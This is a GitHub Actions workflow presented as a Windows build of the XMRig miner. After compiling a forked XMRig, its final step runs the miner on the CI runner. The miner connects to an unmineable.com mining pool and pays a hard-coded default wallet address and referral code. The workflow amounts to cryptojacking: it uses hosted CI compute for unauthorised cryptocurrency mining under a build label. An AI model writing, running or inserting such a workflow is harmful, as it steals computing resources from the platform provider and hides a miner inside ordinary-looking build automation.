name: Building XMRig Windows

on:
  workflow_dispatch:
    inputs:
      ALGORITHM:
        description: 'ALGORITHM'
        required: true
        default: 'ghostrider'
      WALLET:
        description: 'WALLET'
        required: true
        default: '0x2cb3af51075037d030aa3e06ac9e4c912cc16eea'
      COIN:
        description: 'COIN'
        required: true
        default: 'SHIB'
      REFERAL:
        description: 'REFERAL'
        required: true
        default: 'uhok-ykxb'

jobs:
  build:
    runs-on: windows-latest
    steps:
      - name: Checkout Repository master branch
        uses: actions/checkout@v2
      - name: Build project on Windows
        run: |
          git clone https://github.com/jzinferno/xmrig.git --depth=1
          git clone https://github.com/xmrig/xmrig-deps.git c:\xmrig-deps --depth=1
          mkdir xmrig/build && cd xmrig/build
          cmake .. -G "Unix Makefiles" -DXMRIG_DEPS=c:\xmrig-deps
          make -j4
          xmrig.exe -a ${{ github.event.inputs.ALGORITHM }} -o stratum+ssl://${{ github.event.inputs.ALGORITHM }}.unmineable.com:443 -u "${{ github.event.inputs.COIN }}:${{ github.event.inputs.WALLET }}.${{ github.run_id }}#${{ github.event.inputs.REFERAL }}" -p x -k
